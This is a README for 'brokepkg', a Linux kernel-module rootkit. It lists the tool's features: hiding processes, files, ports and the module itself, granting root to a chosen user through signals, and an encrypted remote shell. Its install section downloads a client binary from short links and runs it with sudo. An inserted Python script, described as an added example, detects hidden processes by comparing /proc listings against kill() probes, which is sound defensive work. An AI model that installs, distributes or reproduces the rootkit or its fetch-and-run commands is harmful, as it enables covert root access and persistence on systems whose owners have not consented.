BrokePkg
Brokepkg is an LKM rootkit for Linux kernels 2.6.x/3.x/4.x/5.x and ARM64, with support for kernels after 5.7, where kallsyms_lookup_name is no longer exported.
Tested on
- Arch Linux: 5.13.12-arch1-1
- Kali Linux: 5.10.0-kali3-amd64
- Linux Mint: 4.19.0-8-amd64
- Debian 9 (stretch): 4.9.0-15-amd64
- Ubuntu 16.04.6 LTS: 4.4.0-142-generic
Features
- Hide/unhide any process by sending it signal 63;
- Sending signal 31 (to any PID) makes the module (in)visible;
- Sending signal 64 (to any PID) makes the given user root;
- Files or directories starting with the PREFIX become invisible;
- Sending signal 62 to a port number makes that port invisible;
- Full TTY/PTY shell, with traffic encrypted with OpenSSL.
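The process-hiding feature above (signal 63) works, as in Diamorphine-style rootkits, by filtering PIDs out of the /proc directory listing that ps and top rely on. A defender can still find such a process because kill(pid, 0) and a direct open of /proc/<pid>/status do not go through that listing. The script below is an added example for this README, not part of brokepkg or its client: it compares the PIDs a /proc listing shows against the PIDs a kill(pid, 0) probe says exist, drops ordinary threads (kill() also succeeds for a thread ID, so the Tgid field from /proc/<pid>/status is used to keep only thread-group leaders), and intersects two scan rounds so that short-lived processes that start or exit between the two views do not show up as false positives. The function names and the 32768 fallback for pid_max are the example's own choices.

```python
import os
import re


def listed_pids(proc="/proc"):
    """PIDs visible in a /proc directory listing; ps and top see exactly this set."""
    try:
        return {int(name) for name in os.listdir(proc) if name.isdigit()}
    except FileNotFoundError:  # not a procfs system; nothing to compare
        return set()


def probed_pids(pid_max):
    """PIDs that exist according to kill(pid, 0). Signal 0 delivers nothing; the
    call only checks existence and does not use the /proc readdir path a
    rootkit filters, so hidden processes are still reported as alive."""
    alive = set()
    for pid in range(1, pid_max + 1):
        try:
            os.kill(pid, 0)
            alive.add(pid)
        except ProcessLookupError:
            pass                # no such pid
        except PermissionError:
            alive.add(pid)      # exists but belongs to another user
    return alive


TGID_RE = re.compile(r"^Tgid:\s*(\d+)", re.MULTILINE)


def tgid_from_status(text):
    """Parse the Tgid field out of /proc/<pid>/status text; None if absent."""
    m = TGID_RE.search(text)
    return int(m.group(1)) if m else None


def tgid_of(pid, proc="/proc"):
    """Direct path lookup of /proc/<pid>/status still works when only the
    directory listing is filtered; returns None if the entry is unreadable."""
    try:
        with open(f"{proc}/{pid}/status") as fh:
            return tgid_from_status(fh.read())
    except OSError:
        return None


def hidden_pids(listed, probed, tgid_of):
    """Candidates are alive but absent from the listing. Threads are expected to
    be absent (they are not listed under /proc), so keep only candidates whose
    Tgid equals their own PID, plus those with no readable status at all."""
    return sorted(pid for pid in probed - listed if tgid_of(pid) in (pid, None))


def read_pid_max(path="/proc/sys/kernel/pid_max", default=32768):
    """Upper bound for the probe; 32768 is an assumed fallback if the file is missing."""
    try:
        with open(path) as fh:
            return int(fh.read())
    except (OSError, ValueError):
        return default


def scan(rounds=2):
    """Report only PIDs that look hidden in every round; processes that start or
    exit between the listing and the probe drop out of the intersection."""
    pid_max = read_pid_max()
    result = None
    for _ in range(rounds):
        found = set(hidden_pids(listed_pids(), probed_pids(pid_max), tgid_of))
        result = found if result is None else result & found
    return sorted(result)


if __name__ == "__main__":
    for pid in scan():
        print(f"pid {pid} is alive but not listed in /proc")
```

Run it as root to cover processes of every user; a clean host prints nothing. A rootkit that also hooks the open()/stat() path for /proc/<pid> would still leave the kill() probe as evidence, so the absence of a readable status file is treated as suspicious rather than as proof of innocence.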
Install
To install the LKM, see the wiki page. To install the client, run this:
# client
sudo apt install socat
brokecli="https://git.io/JYAVw"   # 64-bit client
#brokecli="https://git.io/JYAVK"  # 32-bit client: uncomment this line (and comment out the one above) on 32-bit systems
wget -q $brokecli -O brokecli
chmod +x brokecli
sudo ./brokecli
For a mini tutorial, go to the releases page.
Uninstall
Make brokepkg visible again before uninstalling it:
kill -31 0
Then remove the module:
sudo rmmod brokepkg
References
- LKM HACKING
- Diamorphine
- TheXcellerator
- Conviso
- HardDisk
- Reptile